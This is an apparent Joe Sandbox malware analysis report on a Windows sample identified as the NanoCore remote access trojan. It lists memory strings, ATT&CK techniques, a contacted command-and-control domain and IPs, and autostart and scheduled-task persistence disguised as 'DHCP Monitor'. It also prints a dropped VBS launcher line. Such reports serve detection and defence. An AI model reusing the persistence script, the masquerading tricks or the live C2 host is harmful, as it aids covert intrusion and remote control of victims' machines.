    Source: cjlaro.pif, 00000004.00000000.305322925.00000000011B2000.00000002.00020000.sdmp, cjlaro.pif, 0000000A.00000002.337116003.00000000011B2000.00000002.00020000.sdmp, cjlaro.pif, 00000014.00000000.348690315.00000000011B2000.00000002.00020000.sdmp, Binary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript PausedblankinfoquestionstopwarningAutoIt -
    Source: cjlaro.pif, 00000004.00000003.310288716.0000000004CD1000.00000004.00000001.sdmp, Binary or memory string: If WinGetText("Program Manager") = "0" Then}
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00209D99
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020E34B cpuid 0_2_0020E34B
    Source: C:\Users\user\77066510\cjlaro.pif, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_0020CBB8 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,0_2_0020CBB8
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0114E284 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,4_2_0114E284
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011A2BF9 GetUserNameW,4_2_011A2BF9
    Source: C:\Users\user\Desktop\dUzAkYsvl8.exeCode function: 0_2_001FA995 GetVersionExW,0_2_001FA995

    Stealing of Sensitive Information:

    Yara detected Nanocore RAT
    Source: Yara matchFile source: Process Memory Space: cjlaro.pif PID: 5028, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6364, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: cjlaro.pif PID: 7152, type: MEMORYSTR
    Source: cjlaro.pif; Binary or memory string: WIN_XP
    Source: cjlaro.pif; Binary or memory string: WIN_XPe
    Source: cjlaro.pif; Binary or memory string: WIN_VISTA
    Source: cjlaro.pif, 00000014.00000000.348690315.00000000011B2000.00000002.00020000.sdmp; Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte!
    Source: cjlaro.pif; Binary or memory string: WIN_7
    Source: cjlaro.pif; Binary or memory string: WIN_8

    Remote Access Functionality:

    Detected Nanocore Rat
    Source: cjlaro.pif, 00000004.00000003.315424551.0000000004EA3000.00000004.00000001.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
    Source: RegSvcs.exe, 00000005.00000002.560410383.0000000006110000.00000004.00020000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
    Source: cjlaro.pif, 00000014.00000003.363952559.00000000048CF000.00000004.00000001.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
    Yara detected Nanocore RAT
    Source: Yara matchFile source: Process Memory Space: cjlaro.pif PID: 5028, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6364, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: cjlaro.pif PID: 7152, type: MEMORYSTR
    Source: C:\Users\user\77066510\cjlaro.pif; Code function: 4_2_0119C06C OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject, 4_2_0119C06C
    Source: C:\Users\user\77066510\cjlaro.pif; Code function: 4_2_011A65D3 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 4_2_011A65D3
    Source: C:\Users\user\77066510\cjlaro.pif; Code function: 10_2_0119C06C OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,#35, 10_2_0119C06C
    Source: C:\Users\user\77066510\cjlaro.pif; Code function: 20_2_01194EFB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 20_2_01194EFB

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts 2 | Scripting 11 | DLL Side-Loading 1 | Exploitation for Privilege Escalation 1 | Disable or Modify Tools 11 | Input Capture 41 | System Time Discovery 2 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
    Default Accounts | Native API 1 | Valid Accounts 2 | DLL Side-Loading 1 | Deobfuscate/Decode Files or Information 11 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Input Capture 41 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | Command and Scripting Interpreter 2 | Scheduled Task/Job 1 | Valid Accounts 2 | Scripting 11 | Security Account Manager | File and Directory Discovery 3 | SMB/Windows Admin Shares | Clipboard Data 2 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | Scheduled Task/Job 1 | Logon Script (Mac) | Access Token Manipulation 21 | Obfuscated Files or Information 2 | NTDS | System Information Discovery 36 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Remote Access Software 1 | SIM Card Swap | | Carrier Billing Fraud
    Cloud Accounts | Cron | Network Logon Script | Process Injection 312 | Software Packing 12 | LSA Secrets | Security Software Discovery 121 | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol 1 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
    Replication Through Removable Media | Launchd | Rc.common | Scheduled Task/Job 1 | DLL Side-Loading 1 | Cached Domain Credentials | Virtualization/Sandbox Evasion 21 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol 11 | Jamming or Denial of Service | | Abuse Accessibility Features
    External Remote Services | Scheduled Task | Startup Items | Startup Items | Masquerading 12 | DCSync | Process Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
    Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Valid Accounts 2 | Proc Filesystem | Application Window Discovery 11 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
    Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Virtualization/Sandbox Evasion 21 | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
    Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Access Token Manipulation 21 | Network Sniffing | Remote System Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
    Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Process Injection 312 | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop
    Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Hidden Files and Directories 1 | Keylogging | Local Groups | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | | | Inhibit System Recovery

    Behavior Graph

    [Behavior graph image not reproduced. Behavior Graph ID: 500304, Sample: dUzAkYsvl8.exe, Startdate: 11/10/2021, Architecture: WINDOWS, Score: 100]
  


    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label | Link
    dUzAkYsvl8.exe | 52% | Virustotal | | Browse
    dUzAkYsvl8.exe | 56% | ReversingLabs | Win32.Trojan.Lisk |
    dUzAkYsvl8.exe | 100% | Joe Sandbox ML | |

    Dropped Files

    Source | Detection | Scanner | Label | Link
    C:\Users\user\77066510\cjlaro.pif | 100% | Joe Sandbox ML | |
    C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 0% | Metadefender | | Browse
    C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 0% | ReversingLabs | |
    C:\Users\user\77066510\cjlaro.pif | 37% | Metadefender | | Browse
    C:\Users\user\77066510\cjlaro.pif | 56% | ReversingLabs | Win32.Packed.Generic |

    Unpacked PE Files

    Source | Detection | Scanner | Label | Link | Download
    5.2.RegSvcs.exe.500000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7 | | Download File
    5.2.RegSvcs.exe.61b0000.8.unpack | 100% | Avira | TR/NanoCore.fadte | | Download File

    Domains

    No Antivirus matches

    URLs

    Source | Detection | Scanner | Label | Link
    http://www.onnodb.com/aetraymenuH( | 0% | Avira URL Cloud | safe |
    http://crl.microsof | 0% | URL Reputation | safe |
    http://crl.micrH | 0% | Avira URL Cloud | safe |

    Domains and IPs

    Contacted Domains

    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    strongodss.ddns.net | 197.210.84.227 | true | false | | high

      URLs from Memory and Binaries

      Name | Source | Malicious | Antivirus Detection | Reputation
      http://www.onnodb.com/aetraymenuH( | cjlaro.pif, 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp, cjlaro.pif, 0000000A.00000002.337157263.00000000011DB000.00000002.00020000.sdmp, cjlaro.pif, 00000014.00000000.348819086.00000000011DB000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | unknown
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000005.00000002.557771680.0000000002A31000.00000004.00000001.sdmp | false | | high
      http://crl.microsof | RegSvcs.exe, 00000005.00000002.556279118.0000000000E08000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
      http://crl.micrH | RegSvcs.exe, 00000005.00000002.556279118.0000000000E08000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown

        Contacted IPs


        Public

        IP | Domain | Country | Flag | ASN | ASN Name | Malicious
        185.19.85.175 | unknown | Switzerland | | 48971 | DATAWIRE-ASCH | true
        197.210.84.227 | strongodss.ddns.net | Nigeria | | 29465 | VCG-ASNG | false

        General Information

        Joe Sandbox Version:33.0.0 White Diamond
        Analysis ID:500304
        Start date:11.10.2021
        Start time:22:27:55
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 14m 36s
        Hypervisor based Inspection enabled:false
        Report type:full
        Sample file name:dUzAkYsvl8.exe
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
        Number of analysed new started processes analysed:45
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal100.troj.spyw.evad.winEXE@26/37@6/2
        EGA Information:Failed
        HDC Information:
        • Successful, ratio: 17.3% (good quality ratio 16.6%)
        • Quality average: 77.7%
        • Quality standard deviation: 26.3%
        HCA Information:
        • Successful, ratio: 80%
        • Number of executed functions: 170
        • Number of non-executed functions: 216
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Found application associated with file extension: .exe
        Warnings:
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, consent.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
        • Excluded IPs from analysis (whitelisted): 20.50.102.62, 8.247.248.223, 8.247.248.249, 8.247.244.221, 2.20.178.56, 2.20.178.10, 20.199.120.151, 20.199.120.85, 2.20.178.24, 2.20.178.18, 20.199.120.182, 52.251.79.25, 20.54.110.249, 40.112.88.60
        • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
        • Not all processes were analyzed, report is missing behavior information
        • Report creation exceeded maximum time and may have missing behavior and disassembly information.
        • Report creation exceeded maximum time and may have missing disassembly code information.
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtSetInformationFile calls found.

        Simulations

        Behavior and APIs

        Time | Type | Description
        22:29:03 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\77066510\cjlaro.pif C:\Users\user\77066510\txoxpdjc.qnr
        22:29:12 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\77066510\Update.vbs
        22:29:13 | Task Scheduler | Run new task: DHCP Monitor path: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" s>$(Arg0)
        22:29:13 | API Interceptor | 839x Sleep call for process: RegSvcs.exe modified
        22:29:16 | Task Scheduler | Run new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
        22:29:21 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

        ASN

        No context

        JA3 Fingerprints

        No context

        Dropped Files

        No context

        Created / dropped Files

        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
        Category:dropped
        Size (bytes):45152
        Entropy (8bit):6.149629800481177
        Encrypted:false
        SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
        MD5:2867A3817C9245F7CF518524DFD18F28
        SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
        SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
        SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
        Malicious:false
        Antivirus:
        • Antivirus: Metadefender, Detection: 0%, Browse
        • Antivirus: ReversingLabs, Detection: 0%
        Reputation:unknown
        C:\Users\user\77066510\Update.vbs
        Process:C:\Users\user\77066510\cjlaro.pif
        File Type:ASCII text, with no line terminators
        Category:modified
        Size (bytes):107
        Entropy (8bit):5.002783808669296
        Encrypted:false
        SSDEEP:3:FER/n0eFH5OWXp5hCM/XKaDc1WXp5hCMQXBPcU7n:FER/lFHIWXpJfpDeWXpJc0U7
        MD5:D7D163335F9D1CCBAB796BC5C8E03BDD
        SHA1:9CEF3FE22619FAAE680C3920F62B4A89847E929F
        SHA-256:CAA9D279E13AA7ECB9A786A680BD62A60447586237442043244DA003C6DC0C61
        SHA-512:9ABD835B48875A2196D9720977444D32DD791C6A4E6EB7091E97AB1F6966F7E79982C981406E1AEBB1D7DCAD33F2AEA5A05D7CC3995932AA3EA3FB3BC6A72DE2
        Malicious:false
        Reputation:unknown
        Preview: CreateObject("WScript.Shell").Run "C:\Users\user\77066510\cjlaro.pif C:\Users\user\77066510\txoxpdjc.qnr"
        C:\Users\user\77066510\agvlvr.cpl
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):612
        Entropy (8bit):5.429702104548591
        Encrypted:false
        SSDEEP:12:xgRsRrAtZPIlB7Y4HUERSRdlCiMRwCShdzhWmeTDbeorLCU5+WopwlKVBH:xFJAv47/HXRadlCiMRpShdzz8bfrWi+B
        MD5:45CE434F3827D00D9C3AB67BD7079AE8
        SHA1:80C5FB40633B0BCD55516F89523251E6B5E3A809
        SHA-256:F3370937C56AAA052CFF38BC4DD87ED6590C53E5C12F134C509CA67AD248B808
        SHA-512:2A90270A6CA572788ADF9A61F9287FA71322F0F77BADE789B11ABDA146495E061B63ECA9052BD360B9FA38CFCAA7A7C90FCE37E61739431C4E794AC5A0EEBDCC
        Malicious:false
        Reputation:unknown
        C:\Users\user\77066510\aravnorhp.pdf
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):554
        Entropy (8bit):5.5024278614068125
        Encrypted:false
        SSDEEP:12:5YOA/nxL4RlHbcZCVtuJ7p6zPl50DnsvNthFo7OFQXqsIBHeKVZ:5Y9pOcZZJ7pYPD0Ds17Fo7ZqsGR
        MD5:B661EA9D0EE79FC8D6ABDC292228A94E
        SHA1:747EC3AE658432133137C847A997460D2ACCCB31
        SHA-256:8D0D086264BE5B548B5C71591F97D2665F27BE763EADCBA958EEF49B4BC1F490
        SHA-512:4EE3927EA43037719F21704D3BAF53C6344165AEC5C726DF54AC9D199498B1C849FB3047E93C08F188E4AF397F3276AB7C43FBA16CA5A9D2721FF5C085D9FE1C
        Malicious:false
        Reputation:unknown
        C:\Users\user\77066510\bvjuru.dll
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):569
        Entropy (8bit):5.550150501825932
        Encrypted:false
        SSDEEP:12:dtryVYKWnNoxxOc5MaFbeJCxlsQocvSfnRmlFOX1RU/e5NeWfot:dtrT6xAcSaFbeguySfnRMe1Ogen
        MD5:AC41F1ABD1FB73EB627E9A41861CB963
        SHA1:A6997F25AAA3622B5A0485AA266E0AA43F1BFA2A
        SHA-256:848DBD0A158E01F158874EE4F573A5109AF3FAAEEF5B31FC192E3896909B46DF
        SHA-512:4268492CC123118AD90F5A42E2BDB4C417341256C4510AD34A4CFB0C49F8A7830A26F43797CF3F875D3741D000DD51D9043989DC57FB00940B5FE53C3E72CDC5
        Malicious:false
        Reputation:unknown
        C:\Users\user\77066510\cjlaro.pif
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
        Category:dropped
        Size (bytes):776432
        Entropy (8bit):6.353910854155555
        Encrypted:false
        SSDEEP:12288:qBzZm7d9AZAYJVB7ii/XAvKxRJBnwvogSJ4M4G4aKie5DGDt2:kcneJVBvXAvwRJdwvZ5aKie5DGR2
        MD5:279DAE7236F5F2488A4BACDE6027F730
        SHA1:29A012E5259739F24480CEDFD6D5F2D860CFCDB3
        SHA-256:415850F2706681A6D80708FCA8AC18DCF97E58B8F3FDC7BC4B558AB15FC0A03F
        SHA-512:B81276FC4D915A9721DAE15AA064781A1DBA665FF4864CCBDF624E8049C1B3C12A2B374F11CFFCF6E4A5217766836EDBC5F2376FFA8765F9070CBD87D7AE2FE8
        Malicious:true
        Antivirus:
        • Antivirus: Joe Sandbox ML, Detection: 100%
        • Antivirus: Metadefender, Detection: 37%, Browse
        • Antivirus: ReversingLabs, Detection: 56%
        Reputation:unknown
        C:\Users\user\77066510\gmbvs.ini
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):596
        Entropy (8bit):5.49650466783217
        Encrypted:false
        SSDEEP:12:nXNTQQhmCFkEOimlfljPLsd3JXyNRGleqcY5+9fkgCbyHgzhyEhhN7:XJQQ9kE1mlBPAdZXDeqcYgiQHgzkih
        MD5:D24E6E36CA0380D9AE91B95956A2B495
        SHA1:C9AC0D0AABB8FDD8775FE54958DE809E481731F1
        SHA-256:154AF62E924559C5FE675B816B6B2E327D5820CA76409DCCD2CECBB15A48C1D6
        SHA-512:CB6133F7BE480C557B6F42495284AE6394B67D0833105E3555DB091749093D689E4B13B98B9B46DC83BF0E993F9257FF9D9A8D68FA389488EB2D23815C621AEC
        Malicious:false
        Reputation:unknown
        C:\Users\user\77066510\hrennftnds.cpl
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):65398
        Entropy (8bit):5.57926760107341
        Encrypted:false
        SSDEEP:1536:ZeWsPd1VFU1Jj5pTkp8x0AMrqTok8Jb4C4m/le3ma+VBxo1yotcuG:ZH61VyJbxt2Hnbf03mvTxVyG
        MD5:51B278BB20BA6B5C39B96E40B19A591F
        SHA1:CCF1834F98327A25B1404EF9D679B9D8A29D5330
        SHA-256:B68324E9D8A2669F261B06AF1F96DA4CD8360CEF79F76E2AF45EA7E423F96C2D
        SHA-512:0C7B27F4227069385D57CC4983A40DDF55A782DCE47A7BFF2A484C1AE92C0C66FCC7804B7AB25CA175939A6F4816B6E769D69229052F01D94E8EE7D8EEFC4D91
        Malicious:false
        Reputation:unknown
        C:\Users\user\77066510\ini
        Process:C:\Users\user\77066510\cjlaro.pif
        File Type:empty
        Category:dropped
        Size (bytes):0
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3::
        MD5:D41D8CD98F00B204E9800998ECF8427E
        SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
        SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
        SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
        Malicious:false
        Reputation:unknown
        Preview:
        C:\Users\user\77066510\inprv.xl
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):568
        Entropy (8bit):5.424929682839166
        Encrypted:false
        SSDEEP:12:YuTQZItykUeGyjxyGhKzLUtIPtIsyvdVSBwKK+X2bO7nTy:LQZC5xhKzmrsTlNlTy
        MD5:FE93C18D9F3135D1657E5C1EC1738AA6
        SHA1:D4112EA632172366F983DFA963C702CB234F79EF
        SHA-256:04317DBF1CC693EC693A13A0E6A242C1C04B185A73FEE1E689768D354AF48F11
        SHA-512:0ED13CE0171DE1FE5BCD99073A34F1A45630C5140C821F715F280AA21B8912CF5DAFD42B080061AAF25799383370A68C6CD77F2A391CCFABA3923219CA55D764
        Malicious:false
        Reputation:unknown
        C:\Users\user\77066510\jbxbxjeb.dll
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):501
        Entropy (8bit):5.469755934931095
        Encrypted:false
        SSDEEP:12:OAObNzhqrQKrMrxuHqTbSQV8hNyfFysMeRxs:dO5g5A4OjV83yN2e7s
        MD5:C80239502806F958F12FAA39BA84560E
        SHA1:F7C7780C5E5EF39C93E397CB5FEDCC3179CE0546
        SHA-256:D26440B3C6DD42923630C4E5732D635B13F50765D813527D6DCA9725D3B00811
        SHA-512:3B99D9DE4E189C567184F6AE8CDE55090E7E53CDC81B3CCD0B0DE35E5A81E1AD2E266DF739C079CBDFC53CBEEFDD66201401111308142382BB9392D81374F3B8
        Malicious:false
        Reputation:unknown
        C:\Users\user\77066510\keksbhxmev.ppt
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):510
        Entropy (8bit):5.470587495063201
        Encrypted:false
        SSDEEP:12:bnEjM0hglXLpsw6TczgUO2iqWjX1AsqAcnsLGRzEmoB+NMVX1QKgeR:bnEjMgglbpspAxqjX1aAcsym+NMZawR
        MD5:85845D8C48A5A553F765E4B356CD3911
        SHA1:E4616CDD21D9534F30D4DF68A1FB72EEB31169B6
        SHA-256:ECCAADF73B9B6258B128FBB8EA6D09D818F13272DB3FFE93ABD2EBCEF1B0F78C
        SHA-512:6A5E9FE1EAB4168CFCA7A922E62037BD850354BB3B495C6B409DC9FB8DD8E7534173AFC4E38D412F859B8BC8EB86C3E57A2756D3BCCAEC79A853ABED4FCDC210
        Malicious:false
        Reputation:unknown
        C:\Users\user\77066510\krrapb.bmp
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
